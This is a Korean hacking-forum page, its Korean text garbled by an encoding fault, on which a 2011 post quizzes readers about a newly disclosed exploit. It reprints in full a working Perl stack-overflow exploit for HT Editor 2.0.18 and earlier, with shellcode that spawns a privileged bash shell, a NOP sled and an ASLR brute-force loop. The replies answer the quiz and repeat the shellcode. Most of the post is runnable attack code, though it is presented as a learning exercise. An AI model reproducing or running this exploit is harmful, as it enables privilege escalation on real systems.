22019, 1/1101 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ¸Û¸Û
   http://cyworld.co.kr/codesire
   ¿À´ÃÀÇ ÇØÅ· ¹®Á¦

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Board&no=20405 [º¹»ç]


http://www.exploit-db.com/exploits/17083/

¿À´Ã ¿Ã¶ó¿Â 0-day Ãë¾àÁ¡ÀÔ´Ï´Ù

¹®Á¦´Â,

1. ¾î¶² ÇÁ·Î±×·¥¿¡¼­ Ãë¾àÁ¡ÀÌ ¹ß°ßÇÒ±î¿ä?

2. ¾î¶² Á¾·ùÀÇ Ãë¾àÁ¡ÀÌ ¹ß»ýÇÒ±î¿ä?

3. ¾î¶² ÆÄÀÏ Æ÷¸Ë¿¡¼­ ¹ß»ýÇÒ±î¿ä?

4. ¾î´À Çì´õ¿¡¼­ ¹ß»ýÇÒ±î¿ä?

5. »ç¿ëµÈ ½©ÄÚµå´Â?

6. ÀÌ ÄÚµå´Â linux¿ëÀΰ¡¿ä windows¿ëÀΰ¡¿ä?

7. ÀÌ Äڵ尡 ASLRÀ» ¿ìȸÇÏ´Â ¹æ¹ýÀº?

  Hit : 12081     Date : 2011/03/31 10:44



    
.Dolphin ÇØ´äÁö

=============================================

# Exploit Title: HT Editor File openning Stack Overflow (0day)
# Date: March 30th 2011
# Author: ZadYree
# Software Link: <a href=http://hte.sourceforge.net/downloads.html target=_blank>http://hte.sourceforge.net/downloads.html</a>
# Version: <= 2.0.18
# Tested on: Linux/Windows (buffer padding may differ on W32)
# CVE : None

#!/usr/bin/perl
=head1 TITLE

HT Editor <=2.0.18 0day Stack-Based Overflow Exploit


=head2 SYNOPSIS

my $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H*', $retaddr))];


=head1 DESCRIPTION

The vulnerability is triggered by a too large argument (+ path) which simply lets you overwrite eip.

=head2 AUTHOR

ZadYree ~ 3LRVS Team


=head3 SEE ALSO

ZadYree's blog: z4d.tuxfamily.org

3LRVS blog: 3lrvs.tuxfamily.org

Shellcode based on <a href=http://www.shell-storm.org/shellcode/files/shellcode-606.php target=_blank>http://www.shell-storm.org/shellcode/files/shellcode-606.php</a> => Thanks
=cut

use strict;
use warnings;

use constant SHELLCODE => "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e".
"\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8" .
"\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67" .
"\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30" .
"\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4" .
"\x53\x52\x54\x8a\xe2\xce\x81";

use constant NOPZ => ("\x90" x 3000);

$ENV{'TAPZCODE'} = (NOPZ . SHELLCODE);

open(my $fh, ">", "g3tenv.c");
print $fh <<"EOF";
#include <stdio.h>
void main() {
printf("%x", getenv("TAPZCODE"));
}
EOF
system("gcc g3tenv.c -o g3tenv");
my $retaddr = qx{./g3tenv};

my $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H*', $retaddr))];

open(my $as, "<", "/proc/sys/kernel/randomize_va_space");
my $status = <$as>;
close($as);
unless ($status != 0) {
unlink("g3tenv.c", "g3tenv");
exec(@$payload);
}
print "[*]ASLR detected!\012";
print "[*]Bruteforcing ASLR...\012";
while (1) {
$payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H*', $retaddr))];
qx{@$payload};
last unless ($? == 11);
}
unlink("g3tenv.c", "g3tenv");
die "HAPPY Hacking!";
2011/03/31  
prosper 1. HT Editor
2. Stack-Based Overflow
3.??? g3tenv ???
4.hte
5.Linux x86 - execve("/bin/bash", ["/bin/bash", "-p"], NULL)
6.linux
7.
open(my $as, "<", "/proc/sys/kernel/randomize_va_space");
my $status = <$as>;
close($as);
unless ($status != 0) {
unlink("g3tenv.c", "g3tenv");
exec(@$payload);
}
2011/03/31  
ÇÁ¶óÀ̵å 1. HT Editor
2. Stack overflow
3. ??? ¤Ì¤Ì
4. ??? ¤Ì¤Ì
5.
"\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e".
"\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8" .
"\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67" .
"\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30" . "\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4" .
"\x53\x52\x54\x8a\xe2\xce\x81";
6. Linux
7. Bruteforcing
2011/04/01  
     [°øÁö]ÇØÄ¿½ºÄð ÀÌ¿ë¼öÄ¢ 2021/04/11 ¼öÁ¤ÆÇ [54] ÇѽÂÀç 01/05 11617
22018   À¸¾Ó!!![1]     ÇØÅ·ÀßÇϰí½Í´Ù
02/05 44
22017   A¤¿...     ÇØÅ·ÀßÇϰí½Í´Ù
01/27 89
22016   ¿À·£¸¸~     DarkSlayer
12/11 282
22015   ÇØÄ¿½ºÄð ¿¾³¯ BGM[1]     wkfhddl4041
11/07 420
22014   È÷À×...     ÇØÅ·ÀßÇϰí½Í´Ù
11/02 340
22013   ¹ÙµÏ°ú Àå±â     ÇØÅ·ÀßÇϰí½Í´Ù
10/30 374
22012   ³ª´Â ¾ðÁ¦ ¾ÖÀÎÀÌ »ý±â³ª¿è...     ÇØÅ·ÀßÇϰí½Í´Ù
10/27 430
22011   Àü±¹ 1À§     ÇØÅ·ÀßÇϰí½Í´Ù
10/27 380
22010   ´ã¹è ¤»¤»[1]     ÇØÅ·ÀßÇϰí½Í´Ù
10/27 387
22009   ¸ÅÆ®¸¯½ºÀÇ ÆÄ¶õ¾àÀ» ¾Æ½Ê´Ï±î..?     ÇØÅ·ÀßÇϰí½Í´Ù
10/27 368
22008   ¤·¤·[1]     ÇØÅ·ÀßÇϰí½Í´Ù
10/20 362
22007   ¿ÉÄ¡ ÇÙ°¨Áö ÇÁ·Î±×·¥Á» ¸¸µé¾îÁÖ¼¼¿ä[1]     powerima
10/15 363
22006   ÇØÅ·ÆÀ¿ø ¸ðÁý[1]     koromoon
08/27 886
22005   °°ÀÌ ÇØÅ· ÆÀ ÀÌ·ç½ÇºÐ??     hacs98
08/26 575
22004   ¾Æ........ ¤Ð¤Ð     ÇØÅ·ÀßÇϰí½Í´Ù
08/04 738
22003   ±Í¼ö(Сâ¢) µû¶óÇϱâ(?)     ÇØÅ·ÀßÇϰí½Í´Ù
07/28 724
22002   ½º½º·Î ¸ñ¼ûÀ» Á®¹ö¸°´Ù´Â °ÍÀº     ÇØÅ·ÀßÇϰí½Í´Ù
07/27 755
22001   ¹ÌÄ£µí     ÇØÅ·ÀßÇϰí½Í´Ù
07/02 804
22000   »ç¹«½Ç     ÇØÅ·ÀßÇϰí½Í´Ù
07/02 742
1 [2][3][4][5][6][7][8][9][10]..[1101]

Copyright 1999-2026 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org